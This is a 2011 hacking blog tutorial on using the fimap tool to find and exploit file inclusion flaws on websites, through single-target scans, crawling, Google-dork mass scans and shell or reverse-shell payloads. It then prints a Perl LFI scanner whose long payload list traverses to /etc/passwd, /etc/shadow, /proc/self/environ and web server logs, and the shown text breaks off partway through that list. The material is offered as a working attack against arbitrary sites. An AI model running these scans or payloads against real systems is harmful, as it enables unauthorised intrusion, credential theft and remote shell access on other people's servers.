Kaotic Creations

AUTOMATED LFI/RFI SCANNING & EXPLOITING WITH FIMAP

2011-08-19T14:49:00.000-05:00

Today I am going to show you how to use a python based tool called FIMAP to perform automated LFI exploitation to gain shell access on our target site. LFI vulnerabilities are a bit like searching for SQL Injection vulnerabilities but more time consuming and these days there are fewer and fewer machines out there that are straight up vulnerable. FIMAP comes to our aid to take care of a lot of the manual effort which helps to speed things up and increase our chances of gaining remote shell access. The time it takes to manually craft the requests to test for LFI vulnerabilities is painstaking and this is why I find this tool to be extremely helpful. It automates the whole process and comes with built in exploits that actually work. It is capable of running single target scans, Google dork scans, and mass scans from a list file. It can also crawl a target site and create a list file which can be used afterwards with the mass scan mode. Here goes…

Pre-requisites:

· Python installed on system already

· Download copy of FIMAP here: http://code.google.com/p/fimap/downloads/list

· Brain power & patience J

OK so assuming you already have Python installed you will download the latest version of FIMAP from its Google code home, extract to you desired location and then we can begin. You will need to open your command prompt and navigate to the extraction point (unless you added things to your global environment PATH). You can type “fimpay.py –h” to see a quick overview of what options are available, should look like this:

It looks like a lot at first but once you review it is fairly easy to pick up on the syntax and options, as you will find most of the options and arguments are tied to whichever mode you are using. There are four basic modes: single scan, mass scan, Google scan, and Harvest mode. Single scan performs LFI check and audit against a single url. You just supply the URL to scan and it goes to work.

COMMAND: fimap.py –s –u http://target-site.com/index2.php?x=

If you are only going to be scanning a single target site then I highly suggest you run a scan using the Harvester mode first to help increase the chances of finding a vulnerable link. You can simply point FIMAP at the root directory of a site in Harvester mode and it will generate an output file for you to feed into the Mass scan. It looks like this:

COMMAND: fimap.py –H –u http://target-site.com/ -w output.txt

NOTE: you can define the crawl depth by adding the “-d <number of pages to crawl>” flag, as the default is set to 1

COMMAND: fimap.py –H –u http://target-site.com/ -d 3 –w output.txt

Now that we have our output file we can follow things up by switching to the Mass scan mode and audit all of the links we found when we used the Harvester mode. You just point it to the output.txt file from above steps and let it do its thing, like so:

COMMAND: fimap.py –m –l /path/to/list/output.txt

If you prefer to run some large scans using Google and your favorite Google dorks you can switch modes and use the following syntax:

COMMAND: fimap.py –g –q inurl:index2.php?x=

It will run similar to the mass scan mode until it reaches the end of the results…

NOTE: You can further define the Google scan parameters by defining the time in between Google requests using “--googlesleep=<time>” and the pages to read for results from using “-p <page number>”. If you define the number of pages to return you can also add the number of results per page to use using “--results=<10,25,50,100>”, with 100 being the default value. The full syntax would look like this:

COMMAND: fimap.py –g –q inurl:index2.php?x= --googlesleep=5000 –p 15 –results=50

Now once you have run your scans you will be wondering where the results are stored. You can find them in two files, which you will need to search for on your system: fimap_results (xml) and fimap-log (txt). These two files contain the stored results from all of your scans. The location depends on what type of system you are using so just use the run box or the locate command to find them on your system. You can also type “-x” to see a list of possible targets to perform exploitation attempts against in a nice easy to follow interactive session:

COMMAND: fimap.py –x

Simply choose the desired target by entering the number provided. Once a target is selected you will have the opportunity of choosing which vulnerable link to try to exploit. It looks like this:

Once you choose the link to exploit you will have the chance to choose the final payload to use. The default options consist of an integrated shell on the target site or a reverse shell for which you can connect to using NetCat on your local system. The fimap shell is not an interactive shell so you will not be able to use services like SSH but you can use it to gain foothold for further escalation and rooting. Choose your payload, connect, and enjoy. Here is end results from successful exploit using the fimap shell:

You can also play with the configuration file so that you can add some additional features. Most notably you can add support to test for RFI vulnerabilities as well. You simply add you hosting details for your shell of choice into the “config.py” file, save, and then perform quick test to see if it is working. Here are the lines that need to be edited (editable fields in RED); I suggest using the FTP mode if you have the ability to host your shell somewhere:

# FTP Mode

settings["dynamic_rfi"]["ftp"] = {}

settings["dynamic_rfi"]["ftp"]["ftp_host"] = None

settings["dynamic_rfi"]["ftp"]["ftp_user"] = None

settings["dynamic_rfi"]["ftp"]["ftp_pass"] = None

settings["dynamic_rfi"]["ftp"]["ftp_path"] = None # A non existing file without suffix. Example: /home/imax/public_html/payload

settings["dynamic_rfi"]["ftp"]["http_map"] = None # The mapped HTTP path of the file. Example: http://localhost/~imax/payload

# Local Mode

settings["dynamic_rfi"]["local"] = {}

settings["dynamic_rfi"]["local"]["local_path"] = None # A non existing file on your filesystem without prefix which is reachable by http. Example: /var/www/payload

settings["dynamic_rfi"]["local"]["http_map"] = None # The http url of the file without prefix where the file is reachable from the web. Example: http://localhost/payload

Here is the command to test your RFI configuration to see if it will work for exploiting vulnerable links:

COMMAND: fimap.py –test-rfi

This covers the basic usage for FIMAP. This tool is still under development so I encourage you to follow the project for more updates to come. If you want to truly learn how LFI works, then I encourage you to try this out manually after you have found a few with the assistance of the tool. I have also included a modified Perl script below which does some more thorough testing for file presence but is not nearly as full featured, nor is it the quietest tool. Please use responsibly and until next time, Enjoy!

BONUS PERL LFI SCRIPT:

Save the below as “file.pl” and then run using “perl file.pl” and then just enter your target site…

#!/usr/bin/perl
#modified by: Hood3dRob1n
use LWP::UserAgent;
use HTTP::Request;
system('clear','cls');
print "=======================================================\n";
print "=                                                                                                                    =\n";
print "=                                     LFI_scanner v 0.1.5                                         =\n";
print "=                                    ~[ HR Updated Version ]~                                     =\n";
print "=                                                                                                                   =\n";
print "=               input the site: www.memek.com/index.php?id=                        =\n";
print "=                                                                                                                   =\n";
print "=====================================================\n\n";
print '>';chomp($link = <STDIN>);
if($link !~ /http:\/\//) { $link = "http://$link"; }
#httpd type scan
print "\n>press [enter] to check the version of httpd[...]\n";
$httpd =<STDIN>;
$host = $link;
$useragent = LWP::UserAgent->new;
$resp = $useragent->head($host);
print $resp->headers_as_string;
print "\n>press [enter] to check the vulnerability in lfi[...]\n";
$start =<STDIN>;
@vuls = ('/etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../etc/passwd%00',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'/proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'/proc/self/environ%00',
'../proc/self/environ%00',
'../../proc/self/environ%00',
'../../../proc/self/environ%00',
'../../../../proc/self/environ%00',
'../../../../../proc/self/environ%00',
'../../../../../../proc/self/environ%00',
'../../../../../../../proc/self/environ%00',
'../../../../../../../../proc/self/environ%00',
'../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../proc/self/environ%00',
'/etc/group',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'/etc/group%00',
'../etc/group%00',
'../../etc/group%00',
'../../../etc/group%00',
'../../../../etc/group%00',
'../../../../../etc/group%00',
'../../../../../../etc/group%00',
'../../../../../../../etc/group%00',
'../../../../../../../../etc/group%00',
'../../../../../../../../../etc/group%00',
'../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../etc/group%00',
'/etc/security/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'/etc/security/group%00',
'../etc/security/group%00',
'../../etc/security/group%00',
'../../../etc/security/group%00',
'../../../../etc/security/group%00',
'../../../../../etc/security/group%00',
'../../../../../../etc/security/group%00',
'../../../../../../../etc/security/group%00',
'../../../../../../../../etc/security/group%00',
'../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../../etc/security/group%00',
'/etc/user',
'../etc/user',
'../../etc/user',
'../../../etc/user',
'../../../../etc/user',
'../../../../../etc/user',
'../../../../../../etc/user',
'../../../../../../../etc/user',
'../../../../../../../../etc/user',
'../../../../../../../../../etc/user',
'../../../../../../../../../../etc/user',
'../../../../../../../../../../../etc/user',
'/etc/user%00',
'../etc/user%00',
'../../etc/user%00',
'../../../etc/user%00',
'../../../../etc/user%00',
'../../../../../etc/user%00',
'../../../../../../etc/user%00',
'../../../../../../../etc/user%00',
'../../../../../../../../etc/user%00',
'../../../../../../../../../etc/user%00',
'../../../../../../../../../../etc/user%00',
'../../../../../../../../../../../etc/user%00',
'/etc/shadow',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'/etc/shadow%00',
'../etc/shadow%00',
'../../etc/shadow%00',
'../../../etc/shadow%00',
'../../../../etc/shadow%00',
'../../../../../etc/shadow%00',
'../../../../../../etc/shadow%00',
'../../../../../../../etc/shadow%00',
'../../../../../../../../etc/shadow%00',
'../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../etc/shadow%00',
'/etc/security/passwd',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'/etc/security/passwd%00',
'../etc/security/passwd%00',
'../../etc/security/passwd%00',
'../../../etc/security/passwd%00',
'../../../../etc/security/passwd%00',
'../../../../../etc/security/passwd%00',
'../../../../../../etc/security/passwd%00',
'../../../../../../../etc/security/passwd%00',
'../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../etc/security/passwd%00',
'/etc/security/user',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'/etc/security/user%00',
'../etc/security/user%00',
'../../etc/security/user%00',
'../../../etc/security/user%00',
'../../../../etc/security/user%00',
'../../../../../etc/security/user%00',
'../../../../../../etc/security/user%00',
'../../../../../../../etc/security/user%00',
'../../../../../../../../etc/security/user%00',
'../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../etc/security/user%00',
'/etc/security/environ',
'../etc/security/environ',
'../../etc/security/environ',
'../../../etc/security/environ',
'../../../../etc/security/environ',
'../../../../../etc/security/environ',
'../../../../../../etc/security/environ',
'../../../../../../../etc/security/environ',
'../../../../../../../../etc/security/environ',
'../../../../../../../../../etc/security/environ',
'../../../../../../../../../../etc/security/environ',
'../../../../../../../../../../../etc/security/environ',
'/etc/security/environ%00',
'../etc/security/environ%00',
'../../etc/security/environ%00',
'../../../etc/security/environ%00',
'../../../../etc/security/environ%00',
'../../../../../etc/security/environ%00',
'../../../../../../etc/security/environ%00',
'../../../../../../../etc/security/environ%00',
'../../../../../../../../etc/security/environ%00',
'../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../../etc/security/environ%00',
'/etc/security/limits',
'../etc/security/limits',
'../../etc/security/limits',
'../../../etc/security/limits',
'../../../../etc/security/limits',
'../../../../../etc/security/limits',
'../../../../../../etc/security/limits',
'../../../../../../../etc/security/limits',
'../../../../../../../../etc/security/limits',
'../../../../../../../../../etc/security/limits',
'../../../../../../../../../../etc/security/limits',
'../../../../../../../../../../../etc/security/limits',
'/etc/security/limits%00',
'../etc/security/limits%00',
'../../etc/security/limits%00',
'../../../etc/security/limits%00',
'../../../../etc/security/limits%00',
'../../../../../etc/security/limits%00',
'../../../../../../etc/security/limits%00',
'../../../../../../../etc/security/limits%00',
'../../../../../../../../etc/security/limits%00',
'../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../../etc/security/limits%00',
'/usr/lib/security/mkuser.default',
'../usr/lib/security/mkuser.default',
'../../usr/lib/security/mkuser.default',
'../../../usr/lib/security/mkuser.default',
'../../../../usr/lib/security/mkuser.default',
'../../../../../usr/lib/security/mkuser.default',
'../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../usr/lib/security/mkuser.default',
'/usr/lib/security/mkuser.default%00',
'../usr/lib/security/mkuser.default%00',
'../../usr/lib/security/mkuser.default%00',
'../../../usr/lib/security/mkuser.default%00',
'../../../../usr/lib/security/mkuser.default%00',
'../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../../usr/lib/security/mkuser.default%00',
'/apache/logs/access.log',
'../apache/logs/access.log',
'../../apache/logs/access.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/access.log',
'../../../../../../apache/logs/access.log',
'../../../../../../../apache/logs/access.log',
'../../../../../../../../apache/logs/access.log',
'../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../apache/logs/access.log',
'/apache/logs/access.log%00',
'../apache/logs/access.log%00',
'../../apache/logs/access.log%00',
'../../../apache/logs/access.log%00',
'../../../../apache/logs/access.log%00',
'../../../../../apache/logs/access.log%00',
'../../../../../../apache/logs/access.log%00',
'../../../../../../../apache/logs/access.log%00',
'../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../apache/logs/access.log%00',
'/apache/logs/error.log',
'../apache/logs/error.log',
'../../apache/logs/error.log',
'../../../apache/logs/error.log',
'../../../../apache/logs/error.log',
'../../../../../apache/logs/error.log',
'../../../../../../apache/logs/error.log',
'../../../../../../../apache/logs/error.log',
'../../../../../../../../apache/logs/error.log',
'../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../apache/logs/error.log',
'/apache/logs/error.log%00',
'../apache/logs/error.log%00',
'../../apache/logs/error.log%00',
'../../../apache/logs/error.log%00',
'../../../../apache/logs/error.log%00',
'../../../../../apache/logs/error.log%00',
'../../../../../../apache/logs/error.log%00',
'../../../../../../../apache/logs/error.log%00',
'../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../apache/logs/error.log%00',
'/etc/httpd/logs/acces_log',
'../etc/httpd/logs/acces_log',
'../../etc/httpd/logs/acces_log',
'../../../etc/httpd/logs/acces_log',
'../../../../etc/httpd/logs/acces_log',
'../../../../../etc/httpd/logs/acces_log',
'../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces_log%00',
'../etc/httpd/logs/acces_log%00',
'../../etc/httpd/logs/acces_log%00',
'../../../etc/httpd/logs/acces_log%00',
'../../../../etc/httpd/logs/acces_log%00',
'../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'/etc/httpd/logs/error_log',
'../etc/httpd/logs/error_log',
'../../etc/httpd/logs/error_log',
'../../../etc/httpd/logs/error_log',
'../../../../etc/httpd/logs/error_log',
'../../../../../etc/httpd/logs/error_log',
'../../../../../../etc/httpd/logs/error_log',
'../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../etc/httpd/logs/error_log',
'/etc/httpd/logs/error_log%00',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/usr/local/apache/logs/access_ log',
'../usr/local/apache/logs/access_ log',
'../../usr/local/apache/logs/access_ log',
'../../../usr/local/apache/logs/access_ log',
'../../../../usr/local/apache/logs/access_ log',
'../../../../../usr/local/apache/logs/access_ log',
'../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../../usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access_ log%00',
'../usr/local/apache/logs/access_ log%00',
'../../usr/local/apache/logs/access_ log%00',
'../../../usr/local/apache/logs/access_ log%00',
'../../../../usr/local/apache/logs/access_ log%00',
'../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'/usr/local/apache/logs/error_ log',
'../usr/local/apache/logs/error_ log',
'../../usr/local/apache/logs/error_ log',
'../../../usr/local/apache/logs/error_ log',
'../../../../usr/local/apache/logs/error_ log',
'../../../../../usr/local/apache/logs/error_ log',
'../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../../usr/local/apache/logs/error_ log',
'/usr/local/apache/logs/error_ log%00',
'../usr/local/apache/logs/error_ log%00',
'../../usr/local/apache/logs/error_ log%00',
'../../../usr/local/apache/logs/error_ log%00',
'../../../../usr/local/apache/logs/error_ log%00',
'../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'/var/log/apache/access_log',
'../var/log/apache/access_log',
'../../var/log/apache/access_log',
'../../../var/log/apache/access_log',
'../../../../var/log/apache/access_log',
'../../../../../var/log/apache/access_log',
'../../../../../../var/log/apache/access_log',
'../../../../../../../var/log/apache/access_log',
'../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../var/log/apache/access_log',
'/var/log/apache/access_log%00',
'../var/log/apache/access_log%00',
'../../var/log/apache/access_log%00',
'../../../var/log/apache/access_log%00',
'../../../../var/log/apache/access_log%00',
'../../../../../var/log/apache/access_log%00',
'../../../../../../var/log/apache/access_log%00',
'../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../var/log/apache/access_log%00',
'/var/log/apache/error_log',
'../var/log/apache/error_log',
'../../var/log/apache/error_log',
'../../../var/log/apache/error_log',
'../../../../var/log/apache/error_log',
'../../../../../var/log/apache/error_log',
'../../../../../../var/log/apache/error_log',
'../../../../../../../var/log/apache/error_log',
'../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../var/log/apache/error_log',
'/var/log/apache/error_log%00',
'../var/log/apache/error_log%00',
'../../var/log/apache/error_log%00',
'../../../var/log/apache/error_log%00',
'../../../../var/log/apache/error_log%00',
'../../../../../var/log/apache/error_log%00',
'../../../../../../var/log/apache/error_log%00',
'../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../../var/log/apache/error_log%00',
'/var/log/apache2/error_log',
'../var/log/apache2/error_log',
'../../var/log/apache2/error_log',
'../../../var/log/apache2/error_log',
'../../../../var/log/apache2/error_log',
'../../../../../var/log/apache2/error_log',
'../../../../../../var/log/apache2/error_log',
'../../../../../../../var/log/apache2/error_log',
'../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../var/log/apache2/error_log',
'/var/log/apache2/error_log%00',
'../var/log/apache2/error_log%00',
'../../var/log/apache2/error_log%00',
'../../../var/log/apache2/error_log%00',
'../../../../var/log/apache2/error_log%00',
'../../../../../var/log/apache2/error_log%00',
'../../../../../../var/log/apache2/error_log%00',
'../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../../var/log/apache2/error_log%00',
'/var/log/apache2/access_log',
'../var/log/apache2/access_log',
'../../var/log/apache2/access_log',
'../../../var/log/apache2/access_log',
'../../../../var/log/apache2/access_log',
'../../../../../var/log/apache2/access_log',
'../../../../../../var/log/apache2/access_log',
'../../../../../../../var/log/apache2/access_log',
'../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../var/log/apache2/access_log',
'/var/log/apache2/access_log%00',
'../var/log/apache2/access_log%00',
'../../var/log/apache2/access_log%00',
'../../../var/log/apache2/access_log%00',
'../../../../var/log/apache2/access_log%00',
'../../../../../var/log/apache2/access_log%00',
'../../../../../../var/log/apache2/access_log%00',
'../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../../var/log/apache2/access_log%00',
'/var/log/access_log',
'../var/log/access_log',
'../../var/log/access_log',
'../../../var/log/access_log',
'../../../../var/log/access_log',
'../../../../../var/log/access_log',
'../../../../../../var/log/access_log',
'../../../../../../../var/log/access_log',
'../../../../../../../../var/log/access_log',
'../../../../../../../../../var/log/access_log',
'../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../var/log/access_log',
'/var/log/access_log%00',
'../var/log/access_log%00',
'../../var/log/access_log%00',
'../../../var/log/access_log%00',
'../../../../var/log/access_log%00',
'../../../../../var/log/access_log%00',
'../../../../../../var/log/access_log%00',
'../../../../../../../var/log/access_log%00',
'../../../../../../../../var/log/access_log%00',
'../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../../var/log/access_log%00',
'/var/log/error_log',
'../var/log/error_log',
'../../var/log/error_log',
'../../../var/log/error_log',
'../../../../var/log/error_log',
'../../../../../var/log/error_log',
'../../../../../../var/log/error_log',
'../../../../../../../var/log/error_log',
'../../../../../../../../var/log/error_log',
'../../../../../../../../../var/log/error_log',
'../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../var/log/error_log',
'/var/log/error_log%00',
'../var/log/error_log%00',
'../../var/log/error_log%00',
'../../../var/log/error_log%00',
'../../../../var/log/error_log%00',
'../../../../../var/log/error_log%00',
'../../../../../../var/log/error_log%00',
'../../../../../../../var/log/error_log%00',
'../../../../../../../../var/log/error_log%00',
'../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../../var/log/error_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/usr/local/apache/logs/error_log',
'../usr/local/apache/logs/error_log',
'../../usr/local/apache/logs/error_log',
'../../../usr/local/apache/logs/error_log',
'../../../../usr/local/apache/logs/error_log',
